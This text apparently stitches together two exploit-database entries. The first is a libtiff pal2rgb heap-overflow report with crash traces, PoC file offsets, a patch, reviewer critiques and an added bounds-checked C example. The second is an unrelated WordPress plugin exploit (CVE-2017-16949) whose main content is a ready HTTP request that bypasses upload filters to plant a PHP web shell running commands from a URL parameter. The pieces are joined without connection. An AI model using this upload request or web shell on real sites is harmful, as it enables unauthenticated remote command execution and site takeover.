  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==29649==ABORTING

pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188.
That causes a heap overflow and leads to memory corruption in TIFFSetupStrips().

(gdb) r sample.tiff /dev/null
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff
/dev/null
TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory
corruption: 0x0000000000652160 ***

Program received signal SIGABRT, Aborted.
0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
56    ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory.
(gdb) bt
#0  0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at
../nptl/sysdeps/unix/sysv/linux/raise.c:56
#1  0x00007ffff7745028 in __GI_abort () at abort.c:89
#2  0x00007ffff777e2a4 in __libc_message (do_abort=1,
    fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n")
    at ../sysdeps/posix/libc_fatal.c:175
#3  0x00007ffff778c584 in malloc_printerr (ptr=0x652160,
    str=0x7ffff788c4df "malloc(): memory corruption", action=<optimized out>)
at malloc.c:4998
#4  _int_malloc (av=0x7ffff7acd760 <main_arena>, bytes=24) at malloc.c:3449
#5  0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893
#6  0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at
tif_write.c:545
#7  0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=<optimized out>,
    module=0x42de50 <module> "TIFFWriteScanline") at tif_write.c:613
#8  0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80,
buf=buf@entry=0x652070,
    row=row@entry=0, sample=sample@entry=0) at tif_write.c:56
#9  0x0000000000401dbd in main (argc=<optimized out>, argv=<optimized out>) at
pal2rgb.c:200

Affected version: 4.0.9
Latest version: 4.0.9
------- Comment #1 From jungun.baek 2017-11-29 01:44:26 -------
pal2rgb allocates an output buffer to convert the TIFF format. The output buffer always
uses a fixed size (225). However, when writing data to the output buffer, the imagewidth
and imagelength of the input TIFF file are used. This leads to a heap overflow.

1) get imagewidth and imagelength from input TIFF

tools/pal2rgb.c:142     TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth);
tools/pal2rgb.c:143     TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength);

2) allocate output buffer
tools/pal2rgb.c:188       obuf = (unsigned
char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns
always 225.

3) write data to output buffer
tools/pal2rgb.c:191         for (row = 0; row < imagelength; row++) {
tools/pal2rgb.c:192             if (!TIFFReadScanline(in, ibuf, row, 0))
tools/pal2rgb.c:193                 goto done;
tools/pal2rgb.c:194             pp = obuf;
tools/pal2rgb.c:195             for (x = 0; x < imagewidth; x++) { // HEAP
OVERFLOW!
tools/pal2rgb.c:196                 *pp++ = (unsigned char) rmap[ibuf[x]];
tools/pal2rgb.c:197                 *pp++ = (unsigned char) gmap[ibuf[x]];
tools/pal2rgb.c:198                 *pp++ = (unsigned char) bmap[ibuf[x]];
tools/pal2rgb.c:199             }
tools/pal2rgb.c:200             if (!TIFFWriteScanline(out, obuf, row, 0)) //
CRASH!
tools/pal2rgb.c:201                 goto done;
tools/pal2rgb.c:202         }
------- Comment #2 From jungun.baek 2017-11-29 02:28:44 -------
Created an attachment (id=819) [details]
heap overflow PoC
------- Comment #3 From jungun.baek 2017-11-29 06:33:21 -------
The process's heap memory was corrupted by COLORMAP/Image Width/Image Length of
the TIFF document. The offsets of the corresponding values in the poc.tiff file
are shown below.

COLORMAP {
    R : 0x25~0x224
    G : 0x225~0x424
    B : 0x425~0x624
}

Image Width : 0x24FE
Image Length : 0x250A
------- Comment #4 From ncopa@alpinelinux.org 2017-12-07 04:42:35 -------
The following change fixes the described behavior:

diff --git a/tools/pal2rgb.c b/tools/pal2rgb.c
index 7a57800..92d9e29 100644
--- a/tools/pal2rgb.c
+++ b/tools/pal2rgb.c
@@ -184,15 +184,17 @@ main(int argc, char* argv[])
     { unsigned char *ibuf, *obuf;
       register unsigned char* pp;
       register uint32 x;
-      ibuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(in));
-      obuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(out));
+      size_t ibuf_size = TIFFScanlineSize(in);
+      size_t obuf_size = TIFFScanlineSize(out);
+      ibuf = (unsigned char*)_TIFFmalloc(ibuf_size);
+      obuf = (unsigned char*)_TIFFmalloc(obuf_size);
       switch (config) {
       case PLANARCONFIG_CONTIG:
         for (row = 0; row < imagelength; row++) {
             if (!TIFFReadScanline(in, ibuf, row, 0))
                 goto done;
             pp = obuf;
-            for (x = 0; x < imagewidth; x++) {
+            for (x = 0; x < imagewidth && x < (obuf_size-3); x++) {
                 *pp++ = (unsigned char) rmap[ibuf[x]];
                 *pp++ = (unsigned char) gmap[ibuf[x]];
                 *pp++ = (unsigned char) bmap[ibuf[x]];
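Review bot: the new bound `x < (obuf_size-3)` does not stop the overflow in this contig loop: each iteration writes three bytes, so the loop may still write up to 3*(obuf_size-3) bytes into an obuf_size-byte buffer (with the 225-byte obuf from the report that is 666 bytes). The check has to be on bytes, e.g. `(size_t)x * 3 + 3 <= obuf_size`, or better, bail out before the row loop when `imagewidth > obuf_size / 3`, since a silently truncated row yields a wrong image instead of an error. `obuf_size - 3` is also unsigned arithmetic that wraps when TIFFScanlineSize returns less than 3 (it returns 0 on error), and neither _TIFFmalloc result is checked for NULL before use.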
@@ -205,15 +207,15 @@ main(int argc, char* argv[])
         for (row = 0; row < imagelength; row++) {
             if (!TIFFReadScanline(in, ibuf, row, 0))
                 goto done;
-            for (pp = obuf, x = 0; x < imagewidth; x++)
+            for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
                 *pp++ = (unsigned char) rmap[ibuf[x]];
             if (!TIFFWriteScanline(out, obuf, row, 0))
                 goto done;
-            for (pp = obuf, x = 0; x < imagewidth; x++)
+            for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
                 *pp++ = (unsigned char) gmap[ibuf[x]];
             if (!TIFFWriteScanline(out, obuf, row, 0))
                 goto done;
-            for (pp = obuf, x = 0; x < imagewidth; x++)
+            for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++)
                 *pp++ = (unsigned char) bmap[ibuf[x]];
             if (!TIFFWriteScanline(out, obuf, row, 0))
                 goto done;
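Review bot: `x < obuf_size` is the right byte bound for these one-byte-per-pixel loops, but the same condition is now repeated three times and still only truncates instead of failing; one check of `imagewidth > obuf_size` before the row loop, with a `goto done` (matching the contig branch), keeps the three inner loops as they were and turns the geometry mismatch into a visible error rather than an image with cropped rows.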


But pal2rgb still segfaults. New backtrace:

Core was generated by `pal2rgb /home/ncopa/Downloads/poc.tiff out.tiff'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8
(gdb) bt
#0  0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8
#1  0x000065eb6f9c26b7 in TIFFjpeg_abort (sp=sp@entry=0xdbd8738e7c0)
    at tif_jpeg.c:416
#2  0x000065eb6f9c3f8c in JPEGPreDecode (tif=0x65eb6fc06900, s=<optimized out>)
    at tif_jpeg.c:1114
#3  0x000065eb6f9d4305 in TIFFSeek (sample=0, row=54, tif=0x65eb6fc06900)
    at tif_read.c:379
#4  TIFFReadScanline (tif=0x65eb6fc06900, buf=0xdbd8738ef40, row=54, 
    sample=<optimized out>) at tif_read.c:446
#5  0x00000dbd8718c5fc in main (argc=<optimized out>, argv=<optimized out>)
    at pal2rgb.c:194
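
The contig conversion loop from the report with the size check the tool lacks, as an added example (not libtiff's code and not the patch above). `pal2rgb_row` and `demo_row` are names chosen for this page; the example assumes 8-bit palette indices and 8-bit colormap entries (the real tool first rescales 16-bit colormap values, a step omitted here) and constructs its own row and colormap. The check is on bytes, so it refuses a row when 3*imagewidth does not fit the output scanline or imagewidth exceeds the input scanline, and the multiplication is range-checked so a large imagewidth cannot wrap.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Converts one palette row into packed RGB. Returns the number of bytes
 * written, or 0 if the row is refused because the buffers do not match
 * the declared geometry (the condition the report's sample.tiff triggers). */
size_t pal2rgb_row(const uint8_t *ibuf, size_t ibuf_size, uint32_t imagewidth,
                   const uint8_t *rmap, const uint8_t *gmap, const uint8_t *bmap,
                   uint8_t *obuf, size_t obuf_size) {
    if ((size_t)imagewidth > SIZE_MAX / 3)
        return 0;                               /* 3*imagewidth would wrap */
    size_t need = (size_t)imagewidth * 3;
    if (need > obuf_size)
        return 0;                               /* the heap overflow in the report */
    if ((size_t)imagewidth > ibuf_size)
        return 0;                               /* ibuf[x] would read past the input row */
    uint8_t *pp = obuf;
    for (uint32_t x = 0; x < imagewidth; x++) {
        *pp++ = rmap[ibuf[x]];
        *pp++ = gmap[ibuf[x]];
        *pp++ = bmap[ibuf[x]];
    }
    return need;
}

/* Builds a constructed 256-entry palette row and colormap and converts the
 * first imagewidth pixels into obuf (which must hold obuf_size bytes).
 * Returns pal2rgb_row's result so the caller can check it. */
size_t demo_row(uint32_t imagewidth, size_t obuf_size, uint8_t *obuf) {
    uint8_t ibuf[256], rmap[256], gmap[256], bmap[256];
    for (int i = 0; i < 256; i++) {
        ibuf[i] = (uint8_t)i;                   /* column i carries palette index i */
        rmap[i] = (uint8_t)i;
        gmap[i] = (uint8_t)(255 - i);
        bmap[i] = (uint8_t)(i ^ 0x55);
    }
    return pal2rgb_row(ibuf, sizeof ibuf, imagewidth, rmap, gmap, bmap, obuf, obuf_size);
}

int main(void) {
    uint8_t obuf[225];                          /* the scanline size from the report */
    printf("75 px into 225 bytes: %zu bytes written\n", demo_row(75, sizeof obuf, obuf));
    printf("76 px into 225 bytes: %zu bytes written (refused)\n", demo_row(76, sizeof obuf, obuf));
    return 0;
}
```

A 225-byte output scanline holds exactly 75 RGB pixels, so any input whose width tag disagrees with the tags copied to the output file is rejected before the first byte is written, rather than after malloc's arena metadata has been overwritten.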


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43322.zip
            
# Exploit Title: Unauthenticated Arbitrary File Upload
# Date: November 12, 2017
# Exploit Author: Colette Chamberland 
# Author contact: colette@defiant.com
# Author homepage: https://defiant.com
# Vendor Homepage: https://accesspressthemes.com/
# Software Link: https://codecanyon.net/item/accesspress-anonymous-post-pro/9160446
# Version:  < 3.2.0
# Tested on: Wordpress 4.x
# CVE : CVE-2017-16949


Description:
Improper sanitization allows the attacker to override the settings for allowed file extensions and upload file size. This allows
the attacker to upload anything they want, bypassing the filters.
 
PoC:

POST /wp-admin/admin-ajax.php?action=ap_file_upload_action&file_uploader_nonce=[nonce]&allowedExtensions[]=php&sizeLimit=64000 HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7230359611602921801124357792
Content-Length: 264
Referer: http://target.com/
Cookie: PHPSESSID=22cj9s25f72jr376ln2a3oj6h6; 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------7230359611602921801124357792
Content-Disposition: form-data; name="qqfile"; filename="myshell.php"
Content-Type: text/php

<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

-----------------------------7230359611602921801124357792--